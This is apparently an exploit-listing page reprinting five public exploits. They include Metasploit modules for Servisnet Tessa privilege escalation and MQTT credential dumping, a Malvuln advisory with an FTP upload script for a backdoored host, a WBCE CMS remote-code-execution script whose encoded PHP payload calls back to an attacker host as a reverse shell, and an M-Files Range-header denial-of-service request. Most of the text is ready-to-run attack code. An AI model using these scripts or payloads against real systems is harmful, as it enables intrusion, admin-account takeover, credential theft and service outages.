Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Servisnet Tessa - Privilege Escalation (Metasploit)', 'Description' => %q( This module exploits privilege escalation in Servisnet Tessa, triggered by add new sysadmin user with any user authorization . An API request to "/data-service/users/[userid]" with any low-authority user returns other users' information in response. The encrypted password information is included here, but privilage escelation is possible with the active sessionid value. var token = Buffer.from(`${user.username}:${user.usersessionid}`, 'utf8').toString('base64'); The logic required for the Authorization header is as above. Therefore, after accessing an authorized user ID value and active sessionId value, if the username and sessionId values are encoded with base64, a valid Token will be obtained and a new admin user can be added. ), 'References' => [ [ 'CVE', 'CVE-2022-22832' ], [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Privilege-Escalation.html' ], [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ] ], 'Author' => [ 'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus ], 'License' => MSF_LICENSE, 'DisclosureDate' => "Dec 22 2021", 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true } )) register_options([ OptString.new('USERNAME', [true, 'Servisnet Username']), OptString.new('PASSWORD', [true, 'Servisnet Password']), OptString.new('TARGETURI', [true, 'Base path for application', '/']) ]) end # split strings to salt def split(data, string_to_split) word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/) string = word.split('"]').join('').split('["').join('') return string end # split JSONs to salt def splitJSON(data, string_to_split) word = data.scan(/"#{string_to_split}":"([\S\s]*?)"/) string = word.split('"]').join('').split('["').join('') return string end # split JSONs to salt none " def splitJSON2(data, string_to_split) word = data.scan(/"#{string_to_split}":([\S\s]*?),/)[0] string = word.split('"]').join('').split('["').join('') return string end def app_path res = send_request_cgi({ # default.a.get( check 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'), 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /baseURL/ data = res.body #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/) base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0] return base_url else fail_with(Failure::NotVulnerable, 'baseURL not found!') end end def add_user(token, app_path) newuser = Rex::Text.rand_text_alpha_lower(8) id = Rex::Text.rand_text_numeric(4) # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111 json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}' res = send_request_cgi( { 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, app_path, 'users'), 'headers' => { 'Authorization' => token }, 'data' => json_data }) if res && res.code == 200 && res.body =~ /localhost/ print_good("The sysAdmin authorized user has been successfully added.") print_status("Username: #{newuser}") print_status("Password: 1111111111") else fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.') end end def sessionid_check res = send_request_cgi({ # user.usersessionid check 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'), 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /user.usersessionid/ return Exploit::CheckCode::Vulnerable else fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end end def find_admin(token, userid, app_path) res = send_request_cgi({ # token check 'uri' => normalize_uri(target_uri.path, app_path, 'users', userid), 'headers' => { 'Authorization' => token }, 'method' => 'GET' }) if not res && res.code == 200 && res.body =~ /usersessionid/ fail_with(Failure::NotVulnerable, 'An error occurred while use Token. Try again.') end loopid = userid.to_i $i = 0 # The admin userid must be less than the low-authority userid. while $i < loopid do $i +=1 res = send_request_cgi({ # token check 'uri' => normalize_uri(target_uri.path, app_path, 'users', $i), 'headers' => { 'Authorization' => token }, 'method' => 'GET' }) if res.code == 200 and res.body.include? '"Sistem Admin"' admin_uname = splitJSON(res.body, 'username') admin_sessid = splitJSON(res.body, 'usersessionid') admin_userid = splitJSON2(res.body, 'id') enc_token = Rex::Text.encode_base64('' + admin_uname + ':' + admin_sessid + '') token_admin = 'Basic ' + enc_token + '' print_good("Excellent! Admin user found.") print_good("Admin Username: #{admin_uname}") print_good("Admin SessionId: #{admin_sessid}") if session_check(token_admin, admin_userid, admin_uname) == "OK" break end end end end def session_check(token, userid, user) res = send_request_cgi({ # session check 'uri' => normalize_uri(target_uri.path, app_path, 'users', userid), 'headers' => { 'Authorization' => token }, 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /managers_codes/ print_good("Admin session is active.") add_user(token, app_path) return "OK" else print_status("Admin user #{user} is not online. Try again later.") return "NOT" end end def login_check(user, pass) json_data = '{"username": "' + user + '", "password": "' + pass + '"}' res = send_request_cgi( { 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, app_path, 'api', 'auth', 'signin'), 'data' => json_data }) if res && res.code == 200 && res.body =~ /usersessionid/ sessid = splitJSON(res.body, 'usersessionid') userid = splitJSON2(res.body, 'id') print_status("Sessionid: #{sessid}") print_status("Userid: #{userid}") enc_token = Rex::Text.encode_base64('' + user + ':' + sessid + '') token = 'Basic ' + enc_token + '' print_status("Authorization: #{token}") find_admin(token, userid, app_path) else fail_with(Failure::NotVulnerable, 'An error occurred while login. Try again.') end end def check if sessionid_check return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def run unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end login_check(datastore['USERNAME'], datastore['PASSWORD']) end end </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/99b4428521fa9d9da18e0ccd79e5b985.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Bionet.10 Vulnerability: Authentication Bypass RCE Description: The malware listens on TCP port 12348. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution. Type: PE32 MD5: 99b4428521fa9d9da18e0ccd79e5b985 Vuln ID: MVID-2021-0414 Disclosure: 12/03/2021 Exploit/PoC: nc64.exe 192.168.18.125 12348 220 BNFTP Server ready. USER malvuln 331 Password required for malvuln. PASS malvuln 230 User malvuln logged in. SYST 215 UNIX Type: L8 Internet Component Suite CDUP 250 CWD command successful. "C:/" is current directory. PASV 227 Entering Passive Mode (192,168,18,125,194,182). STOR DOOM-SM.exe 150 Opening data connection for DOOM-SM.exe. 226 File received ok from socket import * MALWARE_HOST="192.168.18.125" PORT=49846 DOOM="DOOM-SM.exe" def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated) # Date: 02/01/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://wbce.org/ # Software Link: https://wbce.org/de/downloads/ # Version: 1.5.2 # Tested on: Linux - PHP Version: 8.0.14 # Github repo: https://github.com/WBCE/WBCE_CMS # -*- coding: utf-8 -*- #/usr/bin/env python import requests import string import base64 import argparse import time import io from bs4 import BeautifulSoup #pip install beautifulsoup4 PAYLOAD = 'UEsDBBQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMAAAAdDE4YmtuZXYucGhwhVVtT9swEP6OxH8wUaQmUqAJ24epUSYh6CY0CbQC2weGIje5UKuJndkOhSH++85OQqqqtBIizr08eZ6783U8nujoy3zJ4enwAF8ODxToVLMK0pJVTHuhH7u/prOby+urxIlOQid2WZ246Wz68256c3vvSHhKWe08xG4tpN70GJvxZYuGL1PF/kESfQ7D2F1JpiGlCW/KMnZBSiHf39QCyjIZNZxWQI5pTFYxYXlMxnPGx2pBjtkodnMKleBJiCeYN494YIVXNDzTTPAUnpnSyhvVGddlWgi5HPn+q1uzPBlMnm9yrDE5jvzXWjKuUbMznc2uZxNyTvlIExPp+DE8oyfy47cuxX+1lrC11EKx51SBViz3/E04o66H62PWIXsxUfwGpQIypP4+m11dXn2fkG+UlZATLUgbyxScEHK7YIrg39+GaSCZqNBDKM8JF0icalqeOIifLXImPWeM56aiamm7qkS2TArzX9TAPWxrYFsYmG5wYR9Ky+BTaMt0ZBPWVHV+4rXxG4JAZZLVWkhVQ5ZQKemLFyZf24NTsxqcwJGOH0SbxhUaT7cYkXItRQZKJeaZWtbtrAQb3wtck6Za3kylEpRoZAZej+B/1GxV0xUnFnRdD+oEWpn+pvMSy8D4o9d+4z58CLBAOwKifQGnHwbYkhvnO9mbJjP8C7wnL8RUAHKC9wykgpa1mRBs5cS2EiWsFqwE1PBqbgeIosXcov/GZmeCc7BXiGiQFeNUQ44wcyS3jN86kEHah0BdobeiuPjIU9pORSdyKNZ7VbDhvKnSbEH5I+SpCQOtkvdClUjU67CCfqEE/S4JzC6xE8B4uv6lLsO3JWmXhz/U9/r8B5lNzy6Qrct43eikMPF97rDHEHp7+oS0iYhQWFJrk9J6cKDWaQ3Sd1O7vbi+u91GbkDYT9CCbKFo5O2kd7qfHg7ALnqnu+kNIHvpvRVZKVRnxiD7NpR50xJtWuxw2SVircNaiPsfENJTcpXG06OVfNTt6W7mnc73hztI6fBAgm4kJ2H8H1BLAQI/ABQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMACQAAAAAAAAAIAAAAAAAAAB0MThia25ldi5waHAKACAAAAAAAAEAGACAuZAFVv7XAYC5kAVW/tcB6Bk8KTf+1wFQSwUGAAAAAAEAAQBeAAAALgMAAAAA' def main(): parser = argparse.ArgumentParser(description='WBCE <= 1.5.2 - Remote Code Execution (Authenticated)') parser.add_argument('-x', '--url', type=str, required=True) parser.add_argument('-u', '--user', type=str, required=False) parser.add_argument('-p', '--password', type=str, required=False) parser.add_argument('-ah', '--attacker_host', type=str, required=False) parser.add_argument('-ap', '--attacker_port', type=str, required=False) args = parser.parse_args() print("\nWBCE 1.5.2 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") exploit(args, PAYLOAD) def exploit(args, payload): s2 = requests.Session() #login body= {'url':'','username_fieldname':'username_t18bknev','password_fieldname':'password_t18bknev','username_t18bknev':args.user,'password_t18bknev':args.password} r = s2.post(args.url+'/admin/login/index.php', data=body, allow_redirects=False) if(r.status_code==302 and r.headers['location'].find('/start/') != -1): print("[*] Login OK") else: print("[*] Login Failed") exit(1) time.sleep(1) #create droplet up = {'userfile':('t18bknev.zip', io.BytesIO(base64.b64decode(PAYLOAD)), "multipart/form-data")} r = s2.post(args.url+'/admin/admintools/tool.php?tool=droplets&upload=1', files=up) if(r.status_code==200 and r.text.find('1 Droplet(s) imported') != -1): print("[*] Droplet OK") else: print("[*] Exploit Failed") exit(1) time.sleep(1) #get csrf token r = s2.get(args.url+'/admin/pages/index.php') soup = BeautifulSoup(r.text, 'html.parser') formtoken = soup.find('input', {'name':'formtoken'})['value'] #create page body= {'formtoken':formtoken,'title':'t18bknev','type':'wysiwyg','parent':'0','visibility':'public','save':''} r = s2.post(args.url+'/admin/pages/add.php', data=body, allow_redirects=False) soup = BeautifulSoup(r.text, 'html.parser') try: page_id = soup.findAll("script")[9].string.split("location.href='")[-1].split("\");")[0].split("'")[0].split("=")[1] print("[*] Page OK ["+page_id+"]") except: print("[*] Exploit Failed") exit(1) time.sleep(1) #get csrf token print("[*] Getting token") r = s2.get(args.url+'/admin/pages/modify.php?page_id='+page_id) soup = BeautifulSoup(r.text, 'html.parser') formtoken = soup.find('input', {'name':'formtoken'})['value'] section_id = soup.find('input', {'name':'section_id'})['value'] time.sleep(1) #add droplet to page body= {'page_id':page_id,'formtoken':formtoken,'section_id':section_id,'content'+section_id:'[[t18bknev]]','modify':'save'} r = s2.post(args.url+'/modules/wysiwyg/save.php', data=body, allow_redirects=False) if(r.status_code==200 and r.text.find('Page saved') != -1): print("[*] Adding droplet OK") else: print("[*] Exploit Failed") exit(1) time.sleep(1) input("Please make sure that your nc listner is ready...\n\nPRESS ENTER WHEN READY") body= {'rev_ip':args.attacker_host,'rev_port':args.attacker_port} r = s2.post(args.url+'/pages/t18bknev.php', data=body, allow_redirects=False) if(r.status_code==200): print("[*] Exploit OK - check your listner") exit(0) else: print("[*] Exploit Failed") exit(1) if __name__ == '__main__': main() </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mqtt' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::MQTT include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)', 'Description' => %q( This module exploits MQTT creds dump vulnerability in Servisnet Tessa. The app.js is publicly available which acts as the backend of the application. By exposing a default value for the "Authorization" HTTP header, it is possible to make unauthenticated requests to some areas of the application. Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method. A new admin user can be added to the database with this header obtained in the source code. The module tries to log in to the MQTT service with the credentials it has obtained, and reflects the response it receives from the service. ), 'References' => [ [ 'CVE', 'CVE-2022-22833' ], [ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ], [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ] ], 'Author' => [ 'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus ], 'License' => MSF_LICENSE, 'DisclosureDate' => "Dec 22 2021", 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true } )) register_options([ OptString.new('TARGETURI', [true, 'Base path for application', '/']) ]) end # split strings to salt def split(data, string_to_split) word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/) string = word.split('"]').join('').split('["').join('') return string end def check_mqtt res = send_request_cgi({ # default.a.get( check 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'), 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /connectionMQTT/ data = res.body #word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/) mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0] rhost = mqtt_host.split('mqtts://').join('') print_status("MQTT Host: #{mqtt_host}") mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0] print_status("MQTT Port: #{mqtt_port}") mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0] print_status("MQTT Endpoint: #{mqtt_end}") mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0] print_status("MQTT clientId: #{mqtt_cl}") mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0] print_status("MQTT username: #{mqtt_usr}") mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0] print_status("MQTT password: #{mqtt_pass}") print_status("##### Starting MQTT login sweep #####") # Removed brute force materials that can be included for the collection. cred_collection = Metasploit::Framework::CredentialCollection.new( password: mqtt_pass, username: mqtt_usr ) # this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit. cred_collection = prepend_db_passwords(cred_collection) scanner = Metasploit::Framework::LoginScanner::MQTT.new( host: rhost, port: mqtt_port, read_timeout: datastore['READ_TIMEOUT'], client_id: client_id, proxies: datastore['PROXIES'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], bruteforce_speed: datastore['BRUTEFORCE_SPEED'], connection_timeout: datastore['ConnectTimeout'], max_send_size: datastore['TCP::max_send_size'], send_delay: datastore['TCP::send_delay'], framework: framework, framework_module: self, ssl: datastore['SSL'], ssl_version: datastore['SSLVersion'], ssl_verify_mode: datastore['SSLVerifyMode'], ssl_cipher: datastore['SSLCipher'], local_port: datastore['CPORT'], local_host: datastore['CHOST'] ) scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: fullname, workspace_id: myworkspace_id ) password = result.credential.private username = result.credential.public if result.success? credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) print_good("MQTT Login Successful: #{username}/#{password}") else invalidate_login(credential_data) vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})") end end end end def auth_bypass res = send_request_cgi({ # default.a.defaults.headers.post["Authorization"] check 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'), 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/ token = split(res.body, 'Authorization') print_status("Authorization: #{token}") return token else fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end end def check if auth_bypass =~ /Basic/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def run unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end check_mqtt end end </code></pre>

<pre><code>I. SUMMARY ============================================================================================================================================================= Title: M-Files Web Improper Range Header Processing Denial of Services (DoS) Vulnerability Product: M-Files Web version before 20.10.9524.1, M-Files Web version before 20.10.9445.0 Vulnerability Type(s): Denial of Services (DoS) Credit by/Researcher: Murat Aydemir (Turkey) Contact: https://twitter.com/mrtydmr75 Github: https://github.com/murataydemir ============================================================================================================================================================= II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES ============================================================================================================================================================= CVE Number: CVE-2021-37253 CVSSv3 Score: 4.3 CVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L) Severity: Medium Confidentiality Impact: None (There is no impact to the confidentiality of the system) Integrity Impact: None (There is no impact to the integrity of the system) Availability Impact: Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable) Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit) Authentication: Not required (Authentication is not required to exploit the vulnerability) Gained Access: None Vulnerability Type(s): Denial of Services (DoS) CWE ID: CWE-399 Resource Management Errors ( https://cwe.mitre.org/data/definitions/399.html) ============================================================================================================================================================= III. TIMELINE ============================================================================================================================================================= Contact to Vendor: the 24th of August, 2020 Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability) Contact to Vendor: the 4th of November, 2020 (provide additional informations & some of proof of concepts) Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability and ask time to fix) Vendor (M-Files) Reply: the 4th of August, 2021 (inform me that "we're accepting this vulnerability but we'll not give an effort to fix that and also will not apply any CVE for this vuln.") Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for CVE. MITRE has reserved CVE to me for this vulnerability) ============================================================================================================================================================= IV. DESCRIPTION & MITIGATION ============================================================================================================================================================= M-Files Web version before 20.10.9524.1 and M-Files Web version before 20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially-crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system. Even if this vulnerability (CVE-2021-37253) has been verified and accepted by the Vendor (M-Files), their security team also contacted me and informed me that no effort will be given to fixing this vulnerability. Thus, there is no active patch, update or mitigation plan for CVE-2021-37253 vulnerability. These are not exactly fix the problem (maybe just remediation), however I strongly recommend you to restrict IP addresses for web applications which incoming requests/clients or reconfigure the web server for "Byte-range Request Segment Size" as soon as possible. ============================================================================================================================================================= V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253 ============================================================================================================================================================= This is easy to detect and exploit for this vulnerability. Just find a static content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a request as follows. GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1 Host: <host> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Connection: close Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0- Note: this issue is valid and easly reproducable for all static assests (which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on) ============================================================================================================================================================= VI. REFERENCE(S) ============================================================================================================================================================= https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253 https://nvd.nist.gov/vuln/detail/CVE-2021-37253 ============================================================================================================================================================= </code></pre>